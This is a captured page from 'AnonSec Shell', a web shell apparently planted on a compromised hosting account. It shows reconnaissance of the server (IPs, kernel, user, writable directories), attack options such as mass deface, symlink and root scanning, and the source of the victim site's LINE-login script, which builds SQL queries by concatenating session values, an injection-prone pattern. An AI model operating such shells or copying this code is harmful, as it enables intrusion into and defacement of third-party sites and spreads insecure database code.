AnonSec Shell
Server IP : 172.67.216.113  /  Your IP : 172.71.28.145   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home2/cp648411/public_html/kainumber.com/loginline/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home2/cp648411/public_html/kainumber.com/loginline/ajax_line.php
<?php
include('../include/class.php');
$dateTime = date("Y-m-d H:i:s");
if($_SESSION["kai_login"] == 0)
{
	if(isset($_SESSION['profile']))
	{
		$list_ch = array('table'=>'member','count'=>'count(id) AS id_cn',
		'where'=>' mail = "'.$_SESSION['line_email'].'" AND type = "line"');
		$view_ch = $view_db->view($list_ch);
		$row_ch = $view_db->q($view_ch);


		if($row_ch['id_cn']==0)
		{
			$list = array(
					'table'=>'member',
					'name'=>"'".$_SESSION['line_name']."'",
					'mail'=>"'".$_SESSION['line_email']."'",
					'type'=>"'line'",
					'status'=>'1',
					'createdate'=>"'".$dateTime."'",
					'up_date'=>"'".$dateTime."'"
				);
			$add_mem_fb = $actiondata_db->add_db($list);
		}
			$list = array('table'=>'member', 'where'=>'name = "'.$_SESSION['line_name'].'" AND mail = "'.$_SESSION['line_email'].'" AND type = "line"');
			$view = $view_db->view($list);
			$row_id = $view_db->q($view);

			$_SESSION["kai_login"] = 1;
			$_SESSION["kai_mail"] = $_SESSION['line_email'];
			$_SESSION["kai_id"] = $row_id["id"];

			$_SESSION["kai_name"] = $_SESSION['line_name'];
			$_SESSION["kai_lastname"] = '';

			$data = array(
				'data1'=> $row_ch,
				'data2'=> $add_mem_fb,
				'status'=> '1',
			);

			echo json_encode($data, JSON_UNESCAPED_UNICODE);
      unset($_SESSION['line_email']);
      unset($_SESSION['line_name']);
      unset($_SESSION['line_pic']);
      header('location: ../index.php');
  }
}
?>

Anon7 - 2022
AnonSec Team